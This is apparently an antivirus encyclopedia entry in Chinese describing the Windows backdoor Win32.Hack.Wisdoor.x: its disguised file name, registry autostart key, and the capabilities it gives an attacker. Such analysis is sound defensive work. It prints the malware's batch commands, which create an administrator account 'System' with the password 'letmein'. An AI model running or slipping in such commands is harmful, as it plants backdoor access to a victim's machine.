Win32.Hack.Wisdoor.x

病毒别名：Backdoor.Wisdoor.x [AVP],BackDoor-AOZ [McAFee],Backdoor/Wisdoor.o [KV]

处理时间：

威胁级别：★

中文名称：金拱门变种X

病毒类型：黑客程序

影响系统：Win9x/WinMe/WinNT/Win2000/WinXP/Win2003

病毒行为:

编写工具:32位汇编语言

传染条件:

发作条件:用户误运行该程序

系统修改:

1.复制病毒到系统目录下%System%RUNDLLEXE,该病毒的名字与系统文件rundll.exe和rundll32.exe很相似,

如果不仔细看,用户一般比较难发现

2.在注册表中子键:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

添加启动项:"Windows DLL Loader"="%System%RUNDLLEXE",以便每次系统启动的时候该病毒也随之启动

3.在系统目录下建立临时批处理文件temp.bat,其内容如下:

@echo off

net user /add System letmein

net localgroup /add Administrators System

del %0

其目的是在染毒系统中添加管理员帐户letmein,为以后入侵该机器作好准备

发作现象:

特别说明:

如果黑客成功的控制了染毒机器,那么危害是比较大的:

A.从染毒机器下载文件

B.向染毒机器上传文件,当然病毒木马也在上传文件之列

C.修改或删除用户的数据

D.在染毒机器上执行某些程序(木马黑客程序应该是最有可能的了,嘿嘿!)

E.终止某些进程(例如:瑞星实时监控程序,天网防火墙等)

F.通过染毒机器向第3台机器发起攻击